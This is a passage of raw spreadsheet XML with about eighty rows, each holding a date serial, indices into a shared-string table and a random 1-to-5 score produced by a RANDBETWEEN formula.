        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14091" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14091" s="1">
        <v>43251.662499999999</v>
      </c>
      <c r="C14091" t="s">
        <v>10</v>
      </c>
      <c r="D14091" t="s">
        <v>251</v>
      </c>
      <c r="E14091" s="2" t="s">
        <v>12639</v>
      </c>
      <c r="F14091">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14092" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14092" s="1">
        <v>43251.635567129626</v>
      </c>
      <c r="C14092" t="s">
        <v>6</v>
      </c>
      <c r="D14092" t="s">
        <v>25</v>
      </c>
      <c r="E14092" s="2" t="s">
        <v>12640</v>
      </c>
      <c r="F14092">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14093" s="1">
        <v>43251.576180555552</v>
      </c>
      <c r="C14093" t="s">
        <v>10</v>
      </c>
      <c r="D14093" t="s">
        <v>271</v>
      </c>
      <c r="E14093" t="s">
        <v>12641</v>
      </c>
      <c r="F14093">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14094" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14094" s="1">
        <v>43251.498402777775</v>
      </c>
      <c r="C14094" t="s">
        <v>253</v>
      </c>
      <c r="E14094">
        <v>9169316071</v>
      </c>
      <c r="F14094">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14095" s="1">
        <v>43251.498229166667</v>
      </c>
      <c r="C14095" t="s">
        <v>10</v>
      </c>
      <c r="D14095" t="s">
        <v>6</v>
      </c>
      <c r="E14095" t="s">
        <v>12642</v>
      </c>
      <c r="F14095">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14096" s="1">
        <v>43251.497557870367</v>
      </c>
      <c r="C14096" t="s">
        <v>253</v>
      </c>
      <c r="F14096">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14097" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14097" s="1">
        <v>43251.480798611112</v>
      </c>
      <c r="C14097" t="s">
        <v>10</v>
      </c>
      <c r="D14097" t="s">
        <v>6</v>
      </c>
      <c r="E14097" s="2" t="s">
        <v>12643</v>
      </c>
      <c r="F14097">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14098" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14098" s="1">
        <v>43251.445231481484</v>
      </c>
      <c r="C14098" t="s">
        <v>10</v>
      </c>
      <c r="D14098" t="s">
        <v>192</v>
      </c>
      <c r="E14098" s="2" t="s">
        <v>12644</v>
      </c>
      <c r="F14098">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14099" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14099" s="1">
        <v>43251.442453703705</v>
      </c>
      <c r="C14099" t="s">
        <v>10</v>
      </c>
      <c r="D14099" t="s">
        <v>112</v>
      </c>
      <c r="E14099" s="2" t="s">
        <v>12645</v>
      </c>
      <c r="F14099">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14100" s="1">
        <v>43251.43917824074</v>
      </c>
      <c r="C14100" t="s">
        <v>60</v>
      </c>
      <c r="E14100" t="s">
        <v>12646</v>
      </c>
      <c r="F14100">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14101" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14101" s="1">
        <v>43251.395208333335</v>
      </c>
      <c r="C14101" t="s">
        <v>41</v>
      </c>
      <c r="E14101" s="2" t="s">
        <v>12647</v>
      </c>
      <c r="F14101">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14102" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14102" s="1">
        <v>43251.388171296298</v>
      </c>
      <c r="C14102" t="s">
        <v>10</v>
      </c>
      <c r="D14102" t="s">
        <v>263</v>
      </c>
      <c r="E14102" s="2" t="s">
        <v>12648</v>
      </c>
      <c r="F14102">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14103" s="1">
        <v>43251.384548611109</v>
      </c>
      <c r="C14103" t="s">
        <v>6</v>
      </c>
      <c r="D14103" t="s">
        <v>25</v>
      </c>
      <c r="F14103">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14104" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14104" s="1">
        <v>43251.382361111115</v>
      </c>
      <c r="C14104" t="s">
        <v>41</v>
      </c>
      <c r="E14104" s="2" t="s">
        <v>12649</v>
      </c>
      <c r="F14104">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14105" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14105" s="1">
        <v>43251.37945601852</v>
      </c>
      <c r="C14105" t="s">
        <v>6</v>
      </c>
      <c r="D14105" t="s">
        <v>25</v>
      </c>
      <c r="E14105" s="2" t="s">
        <v>12650</v>
      </c>
      <c r="F14105">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14106" s="1">
        <v>43251.374722222223</v>
      </c>
      <c r="C14106" t="s">
        <v>724</v>
      </c>
      <c r="E14106" t="s">
        <v>12651</v>
      </c>
      <c r="F14106">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14107" s="1">
        <v>43251.288356481484</v>
      </c>
      <c r="C14107" t="s">
        <v>43</v>
      </c>
      <c r="F14107">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14108" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14108" s="1">
        <v>43251.267187500001</v>
      </c>
      <c r="C14108" t="s">
        <v>41</v>
      </c>
      <c r="E14108" s="2" t="s">
        <v>12652</v>
      </c>
      <c r="F14108">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14109" s="1">
        <v>43251.263379629629</v>
      </c>
      <c r="C14109" t="s">
        <v>41</v>
      </c>
      <c r="E14109" t="s">
        <v>12653</v>
      </c>
      <c r="F14109">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14110" s="1">
        <v>43251.259363425925</v>
      </c>
      <c r="C14110" t="s">
        <v>686</v>
      </c>
      <c r="E14110" t="s">
        <v>12654</v>
      </c>
      <c r="F14110">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14111" s="1">
        <v>43251.225729166668</v>
      </c>
      <c r="C14111" t="s">
        <v>63</v>
      </c>
      <c r="E14111" t="s">
        <v>12655</v>
      </c>
      <c r="F14111">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14112" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14112" s="1">
        <v>43251.182881944442</v>
      </c>
      <c r="C14112" t="s">
        <v>48</v>
      </c>
      <c r="E14112" s="2" t="s">
        <v>12656</v>
      </c>
      <c r="F14112">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14113" s="1">
        <v>43251.119837962964</v>
      </c>
      <c r="C14113" t="s">
        <v>253</v>
      </c>
      <c r="E14113" t="s">
        <v>12657</v>
      </c>
      <c r="F14113">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14114" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14114" s="1">
        <v>43251.049745370372</v>
      </c>
      <c r="C14114" t="s">
        <v>301</v>
      </c>
      <c r="E14114" s="2" t="s">
        <v>12658</v>
      </c>
      <c r="F14114">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14115" s="1">
        <v>43251.046851851854</v>
      </c>
      <c r="C14115" t="s">
        <v>318</v>
      </c>
      <c r="D14115" t="s">
        <v>885</v>
      </c>
      <c r="E14115" t="s">
        <v>12659</v>
      </c>
      <c r="F14115">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14116" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14116" s="1">
        <v>43251.042384259257</v>
      </c>
      <c r="C14116" t="s">
        <v>134</v>
      </c>
      <c r="E14116" s="2" t="s">
        <v>12660</v>
      </c>
      <c r="F14116">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14117" s="1">
        <v>43251.042175925926</v>
      </c>
      <c r="C14117" t="s">
        <v>41</v>
      </c>
      <c r="E14117" t="s">
        <v>12661</v>
      </c>
      <c r="F14117">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14118" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14118" s="1">
        <v>43250.990277777775</v>
      </c>
      <c r="C14118" t="s">
        <v>10</v>
      </c>
      <c r="D14118" t="s">
        <v>89</v>
      </c>
      <c r="E14118" s="2" t="s">
        <v>12662</v>
      </c>
      <c r="F14118">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14119" s="1">
        <v>43250.88349537037</v>
      </c>
      <c r="C14119" t="s">
        <v>253</v>
      </c>
      <c r="F14119">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14120" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14120" s="1">
        <v>43250.824687499997</v>
      </c>
      <c r="C14120" t="s">
        <v>7419</v>
      </c>
      <c r="D14120" t="s">
        <v>821</v>
      </c>
      <c r="E14120" s="2" t="s">
        <v>12663</v>
      </c>
      <c r="F14120">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14121" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14121" s="1">
        <v>43250.754363425927</v>
      </c>
      <c r="C14121" t="s">
        <v>10</v>
      </c>
      <c r="E14121" s="2" t="s">
        <v>12664</v>
      </c>
      <c r="F14121">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14122" s="1">
        <v>43250.726898148147</v>
      </c>
      <c r="C14122" t="s">
        <v>10</v>
      </c>
      <c r="D14122" t="s">
        <v>89</v>
      </c>
      <c r="E14122" t="s">
        <v>12665</v>
      </c>
      <c r="F14122">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14123" s="1">
        <v>43250.71638888889</v>
      </c>
      <c r="C14123" t="s">
        <v>318</v>
      </c>
      <c r="E14123" t="s">
        <v>12666</v>
      </c>
      <c r="F14123">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14124" s="1">
        <v>43250.701562499999</v>
      </c>
      <c r="C14124" t="s">
        <v>10</v>
      </c>
      <c r="D14124" t="s">
        <v>52</v>
      </c>
      <c r="E14124" t="s">
        <v>12667</v>
      </c>
      <c r="F14124">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14125" s="1">
        <v>43250.693738425929</v>
      </c>
      <c r="C14125" t="s">
        <v>6</v>
      </c>
      <c r="D14125" t="s">
        <v>25</v>
      </c>
      <c r="E14125" t="s">
        <v>12668</v>
      </c>
      <c r="F14125">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14126" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14126" s="1">
        <v>43250.665567129632</v>
      </c>
      <c r="C14126" t="s">
        <v>10</v>
      </c>
      <c r="D14126" t="s">
        <v>20</v>
      </c>
      <c r="E14126" s="2" t="s">
        <v>12669</v>
      </c>
      <c r="F14126">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14127" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14127" s="1">
        <v>43250.665138888886</v>
      </c>
      <c r="C14127" t="s">
        <v>6</v>
      </c>
      <c r="D14127" t="s">
        <v>25</v>
      </c>
      <c r="E14127" s="2" t="s">
        <v>12670</v>
      </c>
      <c r="F14127">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14128" s="1">
        <v>43250.648032407407</v>
      </c>
      <c r="C14128" t="s">
        <v>41</v>
      </c>
      <c r="E14128" t="s">
        <v>12671</v>
      </c>
      <c r="F14128">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14129" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14129" s="1">
        <v>43250.645729166667</v>
      </c>
      <c r="C14129" t="s">
        <v>6</v>
      </c>
      <c r="D14129" t="s">
        <v>25</v>
      </c>
      <c r="E14129" t="s">
        <v>12672</v>
      </c>
      <c r="F14129">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14130" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14130" s="1">
        <v>43250.631527777776</v>
      </c>
      <c r="C14130" t="s">
        <v>1812</v>
      </c>
      <c r="D14130" t="s">
        <v>312</v>
      </c>
      <c r="E14130" s="2" t="s">
        <v>12673</v>
      </c>
      <c r="F14130">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14131" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14131" s="1">
        <v>43250.597488425927</v>
      </c>
      <c r="C14131" t="s">
        <v>48</v>
      </c>
      <c r="E14131" s="2" t="s">
        <v>12674</v>
      </c>
      <c r="F14131">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14132" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14132" s="1">
        <v>43250.589965277781</v>
      </c>
      <c r="C14132" t="s">
        <v>6</v>
      </c>
      <c r="D14132" t="s">
        <v>194</v>
      </c>
      <c r="E14132" s="2" t="s">
        <v>12675</v>
      </c>
      <c r="F14132">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14133" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14133" s="1">
        <v>43250.582592592589</v>
      </c>
      <c r="C14133" t="s">
        <v>6</v>
      </c>
      <c r="D14133" t="s">
        <v>25</v>
      </c>
      <c r="E14133" s="2" t="s">
        <v>12676</v>
      </c>
      <c r="F14133">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14134" s="1">
        <v>43250.571481481478</v>
      </c>
      <c r="C14134" t="s">
        <v>290</v>
      </c>
      <c r="E14134" t="s">
        <v>12677</v>
      </c>
      <c r="F14134">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14135" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14135" s="1">
        <v>43250.521261574075</v>
      </c>
      <c r="C14135" t="s">
        <v>10</v>
      </c>
      <c r="D14135" t="s">
        <v>6</v>
      </c>
      <c r="E14135" s="2" t="s">
        <v>12678</v>
      </c>
      <c r="F14135">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14136" s="1">
        <v>43250.491296296299</v>
      </c>
      <c r="C14136" t="s">
        <v>10</v>
      </c>
      <c r="D14136" t="s">
        <v>381</v>
      </c>
      <c r="E14136" t="s">
        <v>12679</v>
      </c>
      <c r="F14136">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14137" s="1">
        <v>43250.48909722222</v>
      </c>
      <c r="C14137" t="s">
        <v>10</v>
      </c>
      <c r="D14137" t="s">
        <v>192</v>
      </c>
      <c r="E14137" t="s">
        <v>12680</v>
      </c>
      <c r="F14137">
        <f t="shared" ca="1" si="220"/>
        <v>5</v>
      </c>
    </row>
    <row r="14138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14138" s="1">
        <v>43250.488541666666</v>
      </c>
      <c r="C14138" t="s">
        <v>10</v>
      </c>
      <c r="D14138" t="s">
        <v>885</v>
      </c>
      <c r="E14138" t="s">
        <v>12681</v>
      </c>
      <c r="F14138">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14139" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14139" s="1">
        <v>43250.479259259257</v>
      </c>
      <c r="C14139" t="s">
        <v>60</v>
      </c>
      <c r="E14139" t="s">
        <v>12682</v>
      </c>
      <c r="F14139">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14140" s="1">
        <v>43250.478483796294</v>
      </c>
      <c r="C14140" t="s">
        <v>10</v>
      </c>
      <c r="D14140" t="s">
        <v>17</v>
      </c>
      <c r="E14140" t="s">
        <v>12683</v>
      </c>
      <c r="F14140">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14141" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14141" s="1">
        <v>43250.466307870367</v>
      </c>
      <c r="C14141" t="s">
        <v>10</v>
      </c>
      <c r="D14141" t="s">
        <v>89</v>
      </c>
      <c r="E14141" s="2" t="s">
        <v>12684</v>
      </c>
      <c r="F14141">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14142" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14142" s="1">
        <v>43250.464305555557</v>
      </c>
      <c r="C14142" t="s">
        <v>10</v>
      </c>
      <c r="D14142" t="s">
        <v>178</v>
      </c>
      <c r="E14142" s="2" t="s">
        <v>12685</v>
      </c>
      <c r="F14142">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14143" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14143" s="1">
        <v>43250.44902777778</v>
      </c>
      <c r="C14143" t="s">
        <v>10</v>
      </c>
      <c r="D14143" t="s">
        <v>158</v>
      </c>
      <c r="E14143" s="2" t="s">
        <v>12686</v>
      </c>
      <c r="F14143">
        <f t="shared" ca="1" si="220"/>
        <v>1</v>
      </c>
    </row>
    <row r="14144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14144" s="1">
        <v>43250.444837962961</v>
      </c>
      <c r="C14144" t="s">
        <v>10</v>
      </c>
      <c r="D14144" t="s">
        <v>20</v>
      </c>
      <c r="E14144" t="s">
        <v>12687</v>
      </c>
      <c r="F14144">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14145" s="1">
        <v>43250.424120370371</v>
      </c>
      <c r="C14145" t="s">
        <v>41</v>
      </c>
      <c r="E14145" t="s">
        <v>12688</v>
      </c>
      <c r="F14145">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14146" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14146" s="1">
        <v>43250.423842592594</v>
      </c>
      <c r="C14146" t="s">
        <v>10</v>
      </c>
      <c r="D14146" t="s">
        <v>23</v>
      </c>
      <c r="E14146" s="2" t="s">
        <v>12689</v>
      </c>
      <c r="F14146">
        <f t="shared" ref="F14146:F14209" ca="1" si="221">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="14147" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14147" s="1">
        <v>43250.423831018517</v>
      </c>
      <c r="C14147" t="s">
        <v>10</v>
      </c>
      <c r="D14147" t="s">
        <v>23</v>
      </c>
      <c r="E14147" s="2" t="s">
        <v>12689</v>
      </c>
      <c r="F14147">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14148" s="1">
        <v>43250.407280092593</v>
      </c>
      <c r="C14148" t="s">
        <v>189</v>
      </c>
      <c r="E14148" t="s">
        <v>12690</v>
      </c>
      <c r="F14148">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14149" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14149" s="1">
        <v>43250.407233796293</v>
      </c>
      <c r="C14149" t="s">
        <v>6</v>
      </c>
      <c r="D14149" t="s">
        <v>194</v>
      </c>
      <c r="E14149" s="2" t="s">
        <v>12691</v>
      </c>
      <c r="F14149">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14150" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14150" s="1">
        <v>43250.379699074074</v>
      </c>
      <c r="C14150" t="s">
        <v>471</v>
      </c>
      <c r="E14150" s="2" t="s">
        <v>12692</v>
      </c>
      <c r="F14150">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14151" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14151" s="1">
        <v>43250.375636574077</v>
      </c>
      <c r="C14151" t="s">
        <v>993</v>
      </c>
      <c r="D14151" t="s">
        <v>20</v>
      </c>
      <c r="E14151" s="2" t="s">
        <v>12693</v>
      </c>
      <c r="F14151">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14152" s="1">
        <v>43250.355914351851</v>
      </c>
      <c r="C14152" t="s">
        <v>559</v>
      </c>
      <c r="D14152" t="s">
        <v>312</v>
      </c>
      <c r="E14152" t="s">
        <v>12694</v>
      </c>
      <c r="F14152">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14153" s="1">
        <v>43250.341111111113</v>
      </c>
      <c r="C14153" t="s">
        <v>328</v>
      </c>
      <c r="E14153" t="s">
        <v>12695</v>
      </c>
      <c r="F14153">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14154" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14154" s="1">
        <v>43250.324606481481</v>
      </c>
      <c r="C14154" t="s">
        <v>48</v>
      </c>
      <c r="E14154" s="2" t="s">
        <v>12696</v>
      </c>
      <c r="F14154">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14155" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14155" s="1">
        <v>43250.276342592595</v>
      </c>
      <c r="C14155" t="s">
        <v>41</v>
      </c>
      <c r="E14155" s="2" t="s">
        <v>12697</v>
      </c>
      <c r="F14155">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14156" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14156" s="1">
        <v>43250.266226851854</v>
      </c>
      <c r="C14156" t="s">
        <v>430</v>
      </c>
      <c r="D14156" t="s">
        <v>312</v>
      </c>
      <c r="E14156" s="2" t="s">
        <v>12698</v>
      </c>
      <c r="F14156">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14157" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14157" s="1">
        <v>43250.222696759258</v>
      </c>
      <c r="C14157" t="s">
        <v>1440</v>
      </c>
      <c r="E14157" t="s">
        <v>12699</v>
      </c>
      <c r="F14157">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14158" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14158" s="1">
        <v>43250.214814814812</v>
      </c>
      <c r="C14158" t="s">
        <v>41</v>
      </c>
      <c r="E14158" s="2" t="s">
        <v>12700</v>
      </c>
      <c r="F14158">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14159" s="1">
        <v>43250.195115740738</v>
      </c>
      <c r="C14159" t="s">
        <v>41</v>
      </c>
      <c r="E14159" t="s">
        <v>12701</v>
      </c>
      <c r="F14159">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14160" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14160" s="1">
        <v>43250.159016203703</v>
      </c>
      <c r="C14160" t="s">
        <v>71</v>
      </c>
      <c r="E14160" s="2" t="s">
        <v>12702</v>
      </c>
      <c r="F14160">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14161" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14161" s="1">
        <v>43250.143472222226</v>
      </c>
      <c r="C14161" t="s">
        <v>559</v>
      </c>
      <c r="E14161" s="2" t="s">
        <v>12703</v>
      </c>
      <c r="F14161">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14162" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14162" s="1">
        <v>43250.132361111115</v>
      </c>
      <c r="C14162" t="s">
        <v>41</v>
      </c>
      <c r="E14162" s="2" t="s">
        <v>12704</v>
      </c>
      <c r="F14162">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14163" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14163" s="1">
        <v>43250.125625000001</v>
      </c>
      <c r="C14163" t="s">
        <v>166</v>
      </c>
      <c r="E14163" s="2" t="s">
        <v>12705</v>
      </c>
      <c r="F14163">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14164" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14164" s="1">
        <v>43250.125509259262</v>
      </c>
      <c r="C14164" t="s">
        <v>139</v>
      </c>
      <c r="E14164" s="2" t="s">
        <v>12706</v>
      </c>
      <c r="F14164">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14165" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14165" s="1">
        <v>43250.119525462964</v>
      </c>
      <c r="C14165" t="s">
        <v>166</v>
      </c>
      <c r="F14165">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14166" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14166" s="1">
        <v>43250.093460648146</v>
      </c>
      <c r="C14166" t="s">
        <v>29</v>
      </c>
      <c r="D14166" t="s">
        <v>163</v>
      </c>
      <c r="E14166" s="2" t="s">
        <v>12707</v>
      </c>
      <c r="F14166">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14167" s="1">
        <v>43250.089178240742</v>
      </c>
      <c r="C14167" t="s">
        <v>339</v>
      </c>
      <c r="F14167">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14168" s="1">
        <v>43250.088506944441</v>
      </c>
      <c r="C14168" t="s">
        <v>60</v>
      </c>
      <c r="E14168" t="s">
        <v>12708</v>
      </c>
      <c r="F14168">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14169" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14169" s="1">
        <v>43250.079965277779</v>
      </c>
      <c r="C14169" t="s">
        <v>253</v>
      </c>
      <c r="E14169" s="2" t="s">
        <v>12709</v>
      </c>
      <c r="F14169">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14170" s="1">
        <v>43249.989282407405</v>
      </c>
      <c r="C14170" t="s">
        <v>151</v>
      </c>
      <c r="E14170" t="s">
        <v>12710</v>
      </c>
      <c r="F14170">
        <f t="shared" ca="1" si="221"/>
